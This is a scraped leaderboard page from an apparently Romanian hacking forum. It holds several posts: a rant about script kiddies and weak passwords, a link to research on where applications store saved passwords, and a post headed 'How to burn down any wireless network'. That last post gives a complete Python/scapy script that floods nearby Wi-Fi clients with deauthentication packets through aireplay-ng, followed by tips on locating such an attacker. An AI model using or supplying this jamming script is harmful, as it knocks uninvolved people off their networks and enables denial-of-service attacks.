Leaderboard
Popular Content
Showing content with the highest reputation on 05/30/10 in all areas
-
De la scobitori la motoare de masini, ce aveti nevoie postati aici. Lucrez la o firma din state care exporta produse in romania la un pret avantajos. Absolut orice. Lasati link catre produse.1 point
-
Pai si cu cine vrei sa vorbesc despre lucrurile pe care le pune begood sau cp/min O fi cateva calculatoare acasa la mine pe care fac diverse test iar daca pun un raspuns la anumite lucruri atat ramane , nu mai adauga nimeni nimic ca si cum ar fii inteles toti tot Sunt obsedat de securitate doar pt ca vad o gramada de admin cu passworduri de tipul 123 care vin platiti o gramada de bani si habar nu au sa faca ceva iar altii lucreaza in locuri de c***t ,vin seara acasa si stau 6-7 ore la pc dupa care se trezesc iar la 6 dimineata si fac 12 ore de munca si vin platiti doar ca sa aiba ce manca In plus iti rup c*****e la munca ca esti prea obosit si ai o groaza de fumuri in cap cu calculatoarele tale si ca nu vei ajunge niciodata nimic (ca si cum parca vei imbatrani muncind in c***t la ei toata viata ) Iar cand vezi ca nu iti merge internetul si suni la un tehnic informatic care lucreaza la ISP-ul care iti da internet si il intrebi frumos de ce oare nu reusesc sa fac ping la adressa ip de la router iti spune ca nu te aude bine pt ca se intrerupe legatura ,iar tu suni din nou , iti raspunde altul care la aceeasi intrebare iti zice ca nu te aude bine si se intrerupe iar legatura, dupa care iti dai seama care e problema ,nimeni nu stia ce inseamna ala ping si cu scuza ca se intrerupe iti inchidea telefonul in fata Parerea mea este ca sa fi foarte precaut chiar si in situatii foarte simple , prefer un password de 50 de caractere la un forum ,doar asa va intra in cap sa il pui destul de tare oriunde va fii necesar si cand va fii necesar Nu trebuie doar sa stii anumite lucruri si sa nu le faci Exista intradevar si chestii de tipul password foarte tare iar paginile sunt vulnerabile la SQLI In plus chestia cu Windows-ul imi sta putin pe c***e nu e numai keylogger sau chesti de genul ,este faptul ca se intampla atatea chestii ciudate in spatele tau pe acest sistem ca nu stii niciodata daca cineva e cu ochii pe tine Prea multe processe si lucruri in background si e prea greu sa controlezi toate astea pt ca sigur iti scapa ceva care va lucra in hidden mode in spatele tau @paxnWo pai si daca spui assembly ,debugging, internetworking ,firewall sau ma rog ai topicuri goale si nu iti ramane decat sa vorbesti singur sau sa iti gasesti niste carti de citit Daca zici yahoo , phishing , hi5, facebook, offtopic , ai un help desk enorm , o gramada de persoane care iti umple toate topic-urile Si raspunsuri de tipul "pai da ce vrei sa spun daca nu stiu " Pai da eu zic : CITESTE CINE TE PUNE SA STAI NUMAI PE MESS SAU SA JOCI JOCURI Daca nu facem un forum de tipul how ho hack a game sau how to f**k yahoo passwords Si il umplem si de o gramada de hacking tools pt windows asa ii vom da possibilitatea sa ne faca SYN flood Ca in afara de put url here and click on the button to attack la nimeni nu ii place nimic Iar chestia cea mai frumoasa o vezi in Club ShowOFF cand cineva face un post iar ceilalti intra si scriu hacked by me dupa care schimba username si password Aici mai vin si ultimii care iti umple topicul si iti spun ca nu mai merge Si apar in continuare o gramada pt ca sa confirme ceea ce a zis ultimul NU MAI MERGE NICI LA MINE And here we go again de la inceputul la sfarsitul saptamanii cu stiri despre niste c******i care ma incurca cand vreau sa fac parsing pt a gasi macar ceva mai interesant Dupa care mai vine cineva si imi spune ca nu stiu sa vorbesc limba romana , parca e vina mea desi incerc sa fiu cat de corect posibil , dar intelegeti ca nu toti sunt romani aici si ca probabil in limba mea veti face mai multe greseli Corectatima da nu imi spuneti ca e de c***t romana pe care o vorbesc Fiecare incearca sa imi gaseasca greselile si sa le comenteze ca sa puna si ei un post in plus , nu astept sa imi spuneti bravo dar macar adaugati si voi anumite argumente daca e cazul sau explicati de ce nu e asa sau ma rog . Fiecare foloseste ce limbaj vrea el iar cred ca daca suntem aici trebuie sa progresam , sa vedem lucruri noi , sa desbatem lucruri noi ,nu putem vorbi despre yahoo spre infinit Un sigur lucru vreau sa adaug NU EXISTA PROGRAM CARE SPARGE PASSWORDURILE PT FACEBOOK,YAHOO,SAU MA ROG Doar bruteforce ,dar nu cred ca are rost pt ca vine blocat dupa cateva tentative Vad multi care cer asa ceva Pai ori il prostesti sa iti dea passwordul ori nu ai passwordul Cateodata nu stiu daca are rost sa scriu asa de mult , pt ca oricum nu cred ca multi vor intelege ceva si sunt sigur ca voi mai vedea un topic de tipul Yahoo messenger passwords , Yahoo booter (dar nimeni nu stie sa faca boti ) )sau Here some DOS tools dupa care RST nu il mai pot deschide deoarece un copil prost face syn flood , Nu mai zic cate c******i voi mai vedea si cati vor zice aceleasi cuvinte si peste 10 ani cand vor ajunge ceva de genul Nickname (Cultul betivilor) "Pai da ce vrei sa zic daca eu nu stiu " Asta e preoblema , sa taci ,fara sa scrii nimic intra ca Guest citeste si gata Edit: Inca o data dovedeste prostia omeneasca A ramas insarcinata cu un film porno Pai si ce inteleg eu aici despre cum sa scriu un shellcode pt intel x86 ? Am gresit eu forumul ? sau ei?1 point
-
Here is the new article explaining about password secrets of some of the popular applications. It is going to explain about the password locations, storage techniques and encryption mechanism used by these applications. This application list has all category of applications such as Internet Browsers, Email Clients, Instant Messengers etc. Some of prominent applications include Firefox, IE, Chrome, GTalk, Trillion, Pidgin, Digsby, Outlook, Thunderbird, AIM, Paltalk, Picasa etc. In today’s Internet driven world, all of use one or other applications starting from browsers, mail clients to instant messengers. Most of these applications store the sensitive information such as user name, password in their private location using proprietary methods.But most applications use simple methods or rather obscure methods to store the credentials which can easily put your privacy in jeopardy as any spyware on your system can easily uncover these secrets. In this context, this article is going to throw a light on those dark regions by exposing the secret storage location and encryption mechanism used by most popular applications. It is also going to present the pointers on how one can uncover such passwords using the tools available today. To know where and how each of these popular applications stores the passwords, read on to the research article ‘Password Secrets of Popular Windows Applications’ http://nagareshwar.securityxploded.com/2010/05/31/password-secrets-of-popular-windows-applications/-1 points
-
How to burn down any wireless network around you and how to find out the exact location of a wireless laptop I made a program which will monitor the air for connections between wireless hot spots and hosts, if the program will find a connection it will send a deauth packet which will disconnect the client, this goes at such a high speed that clients will have no chance to establish a proper connection to the router. #!/usr/bin/python try: import sys,os from scapy.all import * except: print "[-] Could not import all needed things, be sure you have Python, aircrack-ng and scapy installed" sys.exit(0) def deauth_flood(p): if p.haslayer(Dot11): mac = {} mac["ap"]=p.sprintf("%Dot11.addr1%") mac["station1"]=p.sprintf("%Dot11.addr2%") if not mac["ap"]=="ff:ff:ff:ff:ff:ff" and mac["station1"]!="None": os.system("aireplay-ng -0 1 -a "+mac["ap"]+" -c "+mac["station1"]+" "+sys.argv[1]+" &")# Remove " &" for a slower attack rate. def instructions(): print "== WLAN blackout - written by Jelmer de Hen - published at http://h.ackack.net ==\n\ninstructions:\n" print "python "+sys.argv[0]+" [iface]" print "python "+sys.argv[0]+" mon0" if len(sys.argv)>1: print "[+] Searching for packets..." sys.exit(sniff(iface=sys.argv[1],prn=deauth_flood)) else: sys.exit(instructions()) Use at your own risk, you won’t be detected too fast since you send entirely spoofed packets but with the right equipment and skills on the side of the victim side he will be able to do it, normally when these kinds of attacks are launched at company’s they will have to ask the ISP to come with a special device which will track down the exact location of the device. But what when you are being targeted by this attack? First you have to know that this might be hard to detect since it can be exploited from very custom locations, think about: - Attacker is at 1 location not too far away; for example in a car - Moving attacker walking around with a laptop in bag - Infected/botted computer(s) of any kind, could even be your heat pump or light system control system in this case - Malicious pineapples - Phones (like the iphone) - Satellite dish pointed to you - Infected satellite Understand that it is impossible to counter some of these attacks but an iphone or car should be tracable. Requirements: - Movable Linux based PC with wireless capability; if you don’t have a *nix system you can download backtrack for free, burn it to a DVD and boot from it; in the case your PC can’t boot DVD’s you can go for an Ubuntu live CD or another distribution, booting from these CD’s won’t change anything to your actual system. - Wireshark (free) - Aircrack-ng (free) optional: - poitable antenna - thin foil - scissors - glue - cardboard (or other hard bendable material) Why thin foil, scissors and cardboard? To locate the attacker; it would be ideal to have a parabolic reflector to decrease the time it will take for localizing the attacker. You can make the windsurfer or be creative and make something custom, the idea is that you can eliminate 1 side of the antenna and reflect that to the side where you point it to increase your range and elimate the chance of the attacker being behind the antenna. When you have all requirements you can get started, move in the middle of the deauth packets storm and turn on Wireshark & airodump-ng. In wireshark apply “radiotap.length==13? as filter (captures all deauth packets) and make a list of all hosts you see in airodump-ng. Look at the rate with which you capture deauth packets and look in the bottom fields for the connections between routers and hosts, look at the PWR levels here. Now move the windsurfer 90 degrees and look at the rate at which you capture and the deauth packets now, decide if it was less or more, redo this progress until you find the location at where the deauth packets have the highest rate, when being in a building it would be smart to also look under and above you. Once you localized the location where the most deauth packets came from move your PC closer to that source, then redo the process of monitoring where the packets come from and look at aircrack-ng. Once you are very very close you can determine which MAC address is doing this by looking it up in airodump-ng, this machine at that moment will have a very low PWR (0 until -50 is good enough). Now run this command in bash to determine the manufacture of the card so you know something more about the attacking machine. cat `locate manuf` | grep 00:11:22 Replace the latest part with the first part of the MAC address for example when you found the MAC address 55:44:33:22:11:00 then 55:44:33 is the part you will need. Please note that this MAC address can be spoofed and/or not broadcasting so you won’t be able to see it, then you have to do it all with Wireshark and determine where the most packets come from. After you did all this you can just grab that malicious pineapple and smash it as hard as you can. This cheap attack vector can form a high risk level during war, when properly exploited an army can attack an entire city by pointing a satellite dish in their direction or think about an attacker which takes over a satellite and reprograms it to be able to do these kind of attacks, with these techniques it will be hard to prevent those attacks unless we will make big thin foil shields around our city’s. I gave you some basic solutions to find the attacker but this antenna detection way works great also for other means, i once tried this on a friend of mine in my old school to find out his location, it was a multi floor school building and i had no idea where he was, within 15 minutes i found him. //care-l testeaza ? How to burn down any wireless network around you and how to find out the exact location of a wireless laptop-1 points